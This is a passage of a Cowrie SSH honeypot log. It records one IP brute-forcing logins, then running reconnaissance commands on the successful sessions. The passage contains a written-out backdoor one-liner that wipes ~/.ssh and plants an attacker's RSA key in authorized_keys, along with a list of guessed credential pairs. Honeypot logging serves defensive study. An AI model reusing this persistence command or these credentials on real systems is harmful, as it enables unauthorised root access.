.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:14:13.891012Z","src_ip":"212.227.235.229","session":"08cdfe99746b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:14:14.085461Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-09-08T22:14:14.086247Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.login.failed","username":"config","password":"111","message":"login attempt [config/111] failed","sensor":"my-vps","timestamp":"2025-09-08T22:14:14.173429Z","src_ip":"212.227.235.229","session":"a935e959b87f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:14.339630Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:14:14.633565Z","src_ip":"212.227.235.229","session":"08cdfe99746b"}
{"eventid":"cowrie.login.failed","username":"samsung","password":"Password123","message":"login attempt [samsung/Password123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:14:14.707209Z","src_ip":"212.227.235.229","session":"5873c3c0e2fe"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:14.810367Z","src_ip":"212.227.235.229","session":"08cdfe99746b"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:14.817388Z","src_ip":"212.227.235.229","session":"6e542b51414f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:14:14.979749Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-09-08T22:14:14.980683Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:15.478616Z","src_ip":"212.227.235.229","session":"a935e959b87f"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:15.913157Z","src_ip":"212.227.235.229","session":"5873c3c0e2fe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:15.955417Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:14:16.266350Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-08T22:14:16.267085Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:16.517761Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:14:17.977024Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-09-08T22:14:17.977829Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:18.947509Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:14:19.263855Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-09-08T22:14:19.264564Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:20.236081Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:14:20.508873Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-09-08T22:14:20.509701Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:20.765903Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.closed","duration":"36.4","message":"Connection lost after 36.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:20.767362Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54596,"dst_ip":"1.2.3.4","dst_port":22,"session":"45ef9bd3eee1","protocol":"ssh","message":"New connection: 212.227.235.229:54596 (1.2.3.4:22) [session: 45ef9bd3eee1]","sensor":"my-vps","timestamp":"2025-09-08T22:14:43.224672Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:14:43.225662Z","src_ip":"212.227.235.229","session":"45ef9bd3eee1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:14:43.517687Z","src_ip":"212.227.235.229","session":"45ef9bd3eee1"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"root123456","message":"login attempt [ubuntu/root123456] failed","sensor":"my-vps","timestamp":"2025-09-08T22:14:44.728053Z","src_ip":"212.227.235.229","session":"45ef9bd3eee1"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:14:45.547109Z","src_ip":"212.227.235.229","session":"f1dc66b870b0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:14:45.547777Z","src_ip":"212.227.235.229","session":"f1dc66b870b0"}
{"eventid":"cowrie.session.closed","duration":"48.2","message":"Connection lost after 48.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:45.549575Z","src_ip":"212.227.235.229","session":"f1dc66b870b0"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:46.022500Z","src_ip":"212.227.235.229","session":"45ef9bd3eee1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41808,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ce5cdbf57bd","protocol":"ssh","message":"New connection: 212.227.235.229:41808 (1.2.3.4:22) [session: 9ce5cdbf57bd]","sensor":"my-vps","timestamp":"2025-09-08T22:14:49.231839Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:14:49.232938Z","src_ip":"212.227.235.229","session":"9ce5cdbf57bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33244,"dst_ip":"1.2.3.4","dst_port":22,"session":"3272452b50ea","protocol":"ssh","message":"New connection: 212.227.235.229:33244 (1.2.3.4:22) [session: 3272452b50ea]","sensor":"my-vps","timestamp":"2025-09-08T22:14:49.318278Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:14:49.319203Z","src_ip":"212.227.235.229","session":"3272452b50ea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:14:49.626561Z","src_ip":"212.227.235.229","session":"9ce5cdbf57bd"}
{"eventid":"cowrie.login.failed","username":"media","password":"123456","message":"login attempt [media/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T22:14:50.927466Z","src_ip":"212.227.235.229","session":"9ce5cdbf57bd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:14:51.050570Z","src_ip":"212.227.235.229","session":"3272452b50ea"}
{"eventid":"cowrie.login.success","username":"root","password":"mypassword@123","message":"login attempt [root/mypassword@123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:14:51.803166Z","src_ip":"212.227.235.229","session":"3272452b50ea"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:52.245359Z","src_ip":"212.227.235.229","session":"9ce5cdbf57bd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:14:52.364360Z","src_ip":"212.227.235.229","session":"3272452b50ea"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:14:52.365278Z","src_ip":"212.227.235.229","session":"3272452b50ea"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:14:52.366460Z","src_ip":"212.227.235.229","session":"3272452b50ea"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:52.617254Z","src_ip":"212.227.235.229","session":"3272452b50ea"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:14:53.186469Z","src_ip":"212.227.235.229","session":"3272452b50ea"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:14:53.187345Z","src_ip":"212.227.235.229","session":"3272452b50ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48590,"dst_ip":"1.2.3.4","dst_port":22,"session":"1efad561a646","protocol":"ssh","message":"New connection: 212.227.235.229:48590 (1.2.3.4:22) [session: 1efad561a646]","sensor":"my-vps","timestamp":"2025-09-08T22:14:53.189945Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:14:53.191486Z","src_ip":"212.227.235.229","session":"1efad561a646"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:14:53.439357Z","src_ip":"212.227.235.229","session":"3272452b50ea"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:53.440474Z","src_ip":"212.227.235.229","session":"3272452b50ea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:14:53.517332Z","src_ip":"212.227.235.229","session":"1efad561a646"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38520,"dst_ip":"1.2.3.4","dst_port":22,"session":"366bc05d60d9","protocol":"ssh","message":"New connection: 212.227.235.229:38520 (1.2.3.4:22) [session: 366bc05d60d9]","sensor":"my-vps","timestamp":"2025-09-08T22:14:53.686770Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:14:53.688913Z","src_ip":"212.227.235.229","session":"366bc05d60d9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:14:53.937102Z","src_ip":"212.227.235.229","session":"366bc05d60d9"}
{"eventid":"cowrie.login.failed","username":"raspberry","password":"12345678","message":"login attempt [raspberry/12345678] failed","sensor":"my-vps","timestamp":"2025-09-08T22:14:54.813129Z","src_ip":"212.227.235.229","session":"1efad561a646"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:14:54.933936Z","src_ip":"212.227.235.229","session":"366bc05d60d9"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:56.140312Z","src_ip":"212.227.235.229","session":"1efad561a646"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:56.186969Z","src_ip":"212.227.235.229","session":"366bc05d60d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38530,"dst_ip":"1.2.3.4","dst_port":22,"session":"9836635ac63b","protocol":"ssh","message":"New connection: 212.227.235.229:38530 (1.2.3.4:22) [session: 9836635ac63b]","sensor":"my-vps","timestamp":"2025-09-08T22:14:57.195396Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:14:57.196380Z","src_ip":"212.227.235.229","session":"9836635ac63b"}
